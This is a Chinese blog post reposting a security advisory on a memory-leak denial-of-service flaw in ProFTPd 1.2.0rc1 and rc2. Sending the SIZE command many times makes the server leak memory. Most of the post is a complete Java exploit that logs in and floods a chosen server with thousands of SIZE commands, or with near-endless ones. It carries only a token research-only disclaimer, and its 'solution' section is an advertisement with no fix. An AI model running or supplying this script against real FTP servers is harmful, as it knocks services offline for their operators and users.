ProFTPd 远程拒绝服务漏洞 (APP,缺陷)

izuoyan

浏览: 8934487 次
性别:
来自: 上海

最近访客更多访客>>

GDGZWQZ

morelily

eternal1025

devcang

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

2012-06 ( 32)
2012-05 ( 145)
2012-04 ( 50)
更多存档...

Socket J#DOS .net

涉及程序：
ProFTPd

描述：
ProFTPd 内存泄露引起拒绝服务攻击

详细：
ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞，允许恶意用户对它进行拒绝服务攻击。

当 ProFTPd 执行 SIZE FTP 命令时会引起内存泄露漏洞，如果发送大约5000次 SIZE FTP 命令到服务器中可能引起 ProFTPd 耗费超过300KB的内存。如果发送更多的SIZE 命令将引起拒绝服务攻击。

以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负

*/

import java.net.*;
import java.io.*;

class TCPconnection {

　public TCPconnection (String hostname, int portnumber) throws Exception {
　Socket s = doaSocket(hostname, portnumber);
　br = new BufferedReader (new InputStreamReader (s.getInputStream()));
　ps = new PrintStream (s.getOutputStream());
　}

　public String readLine() throws Exception {
　String s;
　try { s = br.readLine(); }
　catch (IOException ioe) {
　System.out.println("TCP Error ... it's a little hax0r exception ;-)");
　throw new Exception ("\nInput Error: I/O Error");
　　}
　return s;
　}

　public void println(String s) {
　　ps.println(s);
　}

　private Socket doaSocket(String hostname, int portnumber) throws Exception {
　Socket s = null;
　int attempts = 0;
　while (s == null && attempts<maxattempts) {
　try { s = new Socket(hostname, portnumber); }
　catch (UnknownHostException uhe) {
　System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
　throw new Exception("\nConnection Error: " + "unknown hostname");
　}
　catch (IOException ioe) {
　System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
　}
　attempts++;
　}
　if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");
　else return s; }
　private final int maxattempts = 5;
　private BufferedReader br;
　private PrintStream ps;

　}

class proftpDoS {

　public static void main(String[] arg) throws Exception {
　InputStreamReader isr;
　BufferedReader tcld;
　String hostnamez, username, password, file, s1, option;
　int i, j, k;
　isr = new InputStreamReader(System.in);
　tcld = new BufferedReader(isr);
　System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
　System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
　hostnamez = "";
　while (hostnamez.length()==0) {
　System.out.print("Please enter the hostname/IP: ");
　hostnamez = tcld.readLine(); }
　username = "";
　while (username.length()==0) {
　System.out.print("Enter the username: ");
　username = tcld.readLine(); }
　password = "";
　while (password.length()==0) {
　System.out.print("Enter the password for that username: ");
　password = tcld.readLine(); }
　file = "";
　while (file.length()==0) {
　System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
　file = tcld.readLine(); }
　System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
　System.out.println("1) Request 10000 size's to the server (it may be enough)");
　System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
　System.out.print("Option: ");
　option = tcld.readLine();
　k = Integer.parseInt(option);
　while (!(k==1 || k==2)) {
　System.out.print("Option not valid, please try again: ");
　option = tcld.readLine();
　k = Integer.parseInt(option); }
　TCPconnection tc = new TCPconnection(hostnamez, 21);
　tc.println("user " + username);
　tc.println("pass " + password);
　if (k==1) {
　　for(i=0;i<10000;i++)
　　tc.println("size " + file); }
　else if (k==2) {
　for(i=1;i<100;i++)
　　for(j=2;j<((int)Math.pow(j,i ));j++)
　　　 tc.println("size " + file); }
　tc.println("quit");
　s1 = tc.readLine();
　while (s1!=null) {
　s1 = tc.readLine();
　System.out.println("Attack completed ... as one of my friends says:");
　System.out.println("Hack just r0cks ;-)");
　}
　}
}

受影响的系统：
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2　

解决方案：
CNNS 为您提供完善的网络安全服务。

分享到：